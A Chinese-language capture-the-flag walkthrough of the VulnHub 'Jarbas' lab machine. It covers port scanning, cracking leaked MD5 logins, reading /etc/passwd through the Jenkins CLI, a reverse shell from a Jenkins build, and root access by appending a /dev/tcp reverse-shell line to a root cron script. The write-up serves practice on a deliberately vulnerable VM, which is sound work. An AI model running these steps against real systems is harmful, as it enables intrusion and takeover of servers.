打靶記錄-Jarbas-Jenkins

靶機連結

https://www.vulnhub.com/entry/jarbas-1,232/

主機發現埠掃描

• 掃描網段存活主機，因為主機是我最後新增的，所以靶機地址是135的

  nmap -sP 192.168.75.0/24   
  //
  Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:03 CST
  Nmap scan report for 192.168.75.1
  Host is up (0.00032s latency).
  MAC Address: 00:50:56:C0:00:08 (VMware)
  Nmap scan report for 192.168.75.2
  Host is up (0.00036s latency).
  MAC Address: 00:50:56:FB:CA:45 (VMware)
  Nmap scan report for 192.168.75.135
  Host is up (0.00032s latency).
  MAC Address: 00:0C:29:08:91:76 (VMware)
  Nmap scan report for 192.168.75.254
  Host is up (0.00021s latency).
  MAC Address: 00:50:56:F8:B3:1A (VMware)
  Nmap scan report for 192.168.75.131
  Host is up.
  

• 掃描主機開放埠，開放埠：22,80,3306,8080

  nmap -sT -min-rate 10000 -p- 192.168.75.135
  //
  Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:05 CST
  Nmap scan report for 192.168.75.135
  Host is up (0.00074s latency).
  Not shown: 65531 closed tcp ports (conn-refused)
  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  3306/tcp open  mysql
  8080/tcp open  http-proxy
  MAC Address: 00:0C:29:08:91:76 (VMware)
  

• 掃描服務版本及系統版本

  nmap -sT -sV -O -p22,80,3306,8080 192.168.75.135
  //
  Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:07 CST
  Nmap scan report for 192.168.75.135
  Host is up (0.00076s latency).
  
  PORT     STATE SERVICE VERSION
  22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
  80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
  3306/tcp open  mysql   MariaDB (unauthorized)
  8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
  MAC Address: 00:0C:29:08:91:76 (VMware)
  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  Device type: general purpose
  Running: Linux 3.X|4.X
  OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  OS details: Linux 3.2 - 4.9
  Network Distance: 1 hop
  

• 掃描漏洞，沒什麼值得注意的漏洞，不過發現了兩個資料夾/icons/ 和/robots.txt

  map -script=vuln -p22,80,3306,8080 192.168.75.135
  //
  Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:08 CST
  Nmap scan report for 192.168.75.135
  Host is up (0.00032s latency).
  
  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  |_http-trace: TRACE is enabled
  | http-enum: 
  |_  /icons/: Potentially interesting folder w/ directory listing
  3306/tcp open  mysql
  8080/tcp open  http-proxy
  | http-enum: 
  |_  /robots.txt: Robots file
  MAC Address: 00:0C:29:08:91:76 (VMware)
  
  

  滲透優先順序 ：80,8080→3306→22

WEB滲透

80埠

• 掃描目錄 192.168.75.135:80

  python .\dirsearch.py -u http://192.168.75.135/
  //
  [14:12:53] 200 -  359B  - /access.html
  [14:12:58] 403 -  210B  - /cgi-bin/
  

• 發現/access.html ，訪問發現是有用的資訊

  Creds encrypted in a safe way!
  <image>
  tiago:5978a63b4654c73c60fa24f836386d87
  trindade:f463f63616cb3f1e81ce46b39f882fd5
  eder:9b38e2b1e8b12f426b0d208a7ab6cb98
  

  乍一看很像MD5，破解後得到以下內容，大概是一些賬號密碼，在哪裡使用暫時還不知道

  tiago:italia99
  trindade:marianna
  eder:vipsu
  

• 再檢視前面nmap掃描出來的icons 目錄，發現沒什麼有用的資訊

8080埠

• 訪問8080埠，發現是登陸頁面，並且是Jenkins CMS

  

• 先訪問nmap掃描出來的robots.txt ,獲得以下內容

  # we don't want robots to click "build" links
  User-agent: *
  Disallow: /
  

  感覺也沒啥利用的

• 回到登陸頁面，嘗試使用之前獲得的使用者資訊登入

  發現 eder:vipsu 可以登入進去

• 進入後臺，仔細挖掘一些有用的設定

  Jenkins CLI , 指令碼命令列 , 系統資訊 等都是我們感興趣的

  

  進入關於jenkins ，發現版本是 2.113

漏洞利用

• 查閱資訊，發現存在任意檔案讀取 CVE-2024-23897，我們嘗試利用

  https://blog.csdn.net/qq_34594929/article/details/136446671

• 進入Jenkins CLI ，下載 Jenkins-cli.jar

• 然後到 管理Jenkins →全域性安全設定 →勾選匿名使用者具有可讀許可權

• 開啟kali命令列輸入，獲得/etc/passwd

  java -jar jenkins-cli.jar -s http://192.168.75.135:8080 connect-node '@/etc/passwd'
  //
  icked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
  ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin: No such agent "ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" exists.
  systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin: No such agent "systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin" exists.
  daemon:x:2:2:daemon:/sbin:/sbin/nologin: No such agent "daemon:x:2:2:daemon:/sbin:/sbin/nologin" exists.
  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin: No such agent "lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin" exists.
  root:x:0:0:root:/root:/bin/bash: No such agent "root:x:0:0:root:/root:/bin/bash" exists.
  jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false: No such agent "jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false" exists.
  adm:x:3:4:adm:/var/adm:/sbin/nologin: No such agent "adm:x:3:4:adm:/var/adm:/sbin/nologin" exists.
  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown: No such agent "shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown" exists.
  sync:x:5:0:sync:/sbin:/bin/sync: No such agent "sync:x:5:0:sync:/sbin:/bin/sync" exists.
  mail:x:8:12:mail:/var/spool/mail:/sbin/nologin: No such agent "mail:x:8:12:mail:/var/spool/mail:/sbin/nologin" exists.
  dbus:x:81:81:System message bus:/:/sbin/nologin: No such agent "dbus:x:81:81:System message bus:/:/sbin/nologin" exists.
  postfix:x:89:89::/var/spool/postfix:/sbin/nologin: No such agent "postfix:x:89:89::/var/spool/postfix:/sbin/nologin" exists.
  operator:x:11:0:operator:/root:/sbin/nologin: No such agent "operator:x:11:0:operator:/root:/sbin/nologin" exists.
  eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash: No such agent "eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash" exists.
  apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin: No such agent "apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin" exists.
  mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin: No such agent "mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin" exists.
  polkitd:x:999:997:User for polkitd:/:/sbin/nologin: No such agent "polkitd:x:999:997:User for polkitd:/:/sbin/nologin" exists.
  sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin: No such agent "sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin" exists.
  halt:x:7:0:halt:/sbin:/sbin/halt: No such agent "halt:x:7:0:halt:/sbin:/sbin/halt" exists.
  nobody:x:99:99:Nobody:/:/sbin/nologin: No such agent "nobody:x:99:99:Nobody:/:/sbin/nologin" exists.
  games:x:12:100:games:/usr/games:/sbin/nologin: No such agent "games:x:12:100:games:/usr/games:/sbin/nologin" exists.
  chrony:x:998:996::/var/lib/chrony:/sbin/nologin: No such agent "chrony:x:998:996::/var/lib/chrony:/sbin/nologin" exists.
  bin:x:1:1:bin:/bin:/sbin/nologin: No such agent "bin:x:1:1:bin:/bin:/sbin/nologin" exists.
  
  ERROR: Error occurred while performing this command, see previous stderr output.
  

  但是讀取不了/etc/shadow ,不過我們發現/etc/passwd裡面存在eder 使用者，和我們進入後臺的使用者名稱一樣，我們嘗試一下使用ssh登入，登陸失敗，換條路子走

利用Jenkins後臺反彈shell

• 發現 新建任務裡面的構建一個自由風格的軟體專案裡面可以執行shell程式碼

  

• 輸入反彈shell程式碼儲存

  

• kali開啟監聽

  nc -lvp 1234
  //            
  listening on [any] 1234 ...
  

• 在Jenkins裡面點選構建，就會執行剛剛輸入的程式碼

• 成功獲得shell

  nc -lvp 1234
  listening on [any] 1234 ...
  192.168.75.135: inverse host lookup failed: Unknown host
  connect to [192.168.75.131] from (UNKNOWN) [192.168.75.135] 54884
  
  python -c "import pty;pty.spawn('/bin/bash')" // 獲得互動shell
  bash-4.2$ ls
  ls
  bash-4.2$ 
  
  

提權

• 檢視透過Jenkins後臺獲得的shell許可權

  bash-4.2$ whoami
  jenkins
  //
  bash-4.2$ sudo -l
  We trust you have received the usual lecture from the local System
  Administrator. It usually boils down to these three things:
  
      #1) Respect the privacy of others.
      #2) Think before you type.
      #3) With great power comes great responsibility.
  
  [sudo] password for jenkins: ^C //要密碼
  //                                                                                           
  bash-4.2$ uname -a
  Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  //
  bash-4.2$ ls -l
  total 0
  //
  bash-4.2$ dpkg -l
  bash: dpkg: command not found
  

  許可權不高不低

• 嘗試檢視crontab是否有root執行的自動化任務

  bash-4.2$ cat /etc/crontab
  cat /etc/crontab
  SHELL=/bin/bash
  PATH=/sbin:/bin:/usr/sbin:/usr/bin
  MAILTO=root
  # For details see man 4 crontabs
  
  # Example of job definition:
  # .---------------- minute (0 - 59)
  # |  .------------- hour (0 - 23)
  # |  |  .---------- day of month (1 - 31)
  # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
  # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
  # |  |  |  |  |
  # *  *  *  *  * user-name  command to be executed
  */5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
  

  檔案內容是：

  bash-4.2$ cat /etc/script/CleaningScript.sh
  #!/bin/bash
  
  rm -rf /var/log/httpd/access_log.txt
  

  存在一條每隔五分鐘 使用root許可權清理某些東西的自動化任務

• 我們可以嘗試追加反彈shell在該指令碼尾部，讓它使用root許可權來執行反彈shell程式碼

  提權成功，獲得root許可權，並且讀取flag內容

  bash-4.2$ echo "/bin/bash >& /dev/tcp/192.168.75.131/1235 0>&1" >> /etc/script/CleaningScript.sh
  //
  <& /dev/tcp/192.168.75.131/1235 0>&1" >> /etc/script/CleaningScript.sh       
  

  nc -lvp 1235                                                        
  listening on [any] 1235 ...
  //
  192.168.75.135: inverse host lookup failed: Unknown host
  connect to [192.168.75.131] from (UNKNOWN) [192.168.75.135] 58338
  python -c "import pty;pty.spawn('/bin/bash')"
  [root@jarbas ~]# whoami
  whoami
  root
  [root@jarbas ~]# uname -a
  uname -a
  Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  [root@jarbas ~]# dpkg -l
  dpkg -l
  bash: dpkg: command not found
  [root@jarbas ~]# cat flag.txt //讀取flag
  cat flag.txt
  Hey!
  
  Congratulations! You got it! I always knew you could do it!
  This challenge was very easy, huh? =)
  
  Thanks for appreciating this machine.
  
  @tiagotvrs 
  [root@jarbas ~]#